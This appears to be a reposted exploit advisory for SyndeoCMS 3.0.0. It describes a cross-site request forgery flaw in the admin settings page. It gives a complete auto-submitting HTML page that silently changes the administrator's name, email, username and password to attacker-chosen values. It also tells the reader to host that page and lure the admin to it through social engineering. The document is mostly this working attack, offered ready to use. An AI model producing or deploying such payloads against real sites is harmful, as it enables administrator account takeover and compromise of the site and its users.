# Google Dork: none
# Date: 5/12/2013
# Exploit Author: Aditya Joshi
# Vendor Homepage: http://www.syndeocms.org/
# Software Link: http://sourceforge.net/projects/syndeocms/files/1.%20SyndeoCMS/
# Version: 3.0.0
# Tested on: Windows 7
Discription ...
In Syndeo CMS an attacker can easily change admin name, password, email through CSRF vulnerability.
The vulnerability exists in http://localhost/cms/starnet/index.php?option=configuration&save=personal , where admin name , password change text fields are without any token.
Exploiting the BUG ...
Create a html page and paste following html code in it ...
exploit.html
<html>
<body onload="form1.submit();">
<form method="POST" name="form1" action="http://localhost/cms/starnet/index.php?option=configuration&save=personal">
<input class="textfield" type="text" value="hacker" size="40" name="fullname" tabindex="1"></input>
<input class="textfield" type="text" value="hacker@email.com" size="40" name="email" tabindex="2"></input>
<input class="textfield" type="text" value="admin" size="20" name="username" tabindex="3"></input>
<input class="textfield" type="password" value="hacker" size="20" name="password" tabindex="4"></input>
</form>
</body>
</html>
and upload malicious page to any free webhosting website..
Now send link of mailicous html page through Social Engenerring to the admin of the vulnerable syndeo web app
Greets ---> Aditya Dixit, Deejay alone , Indian Web King....
0 comments:
Post a Comment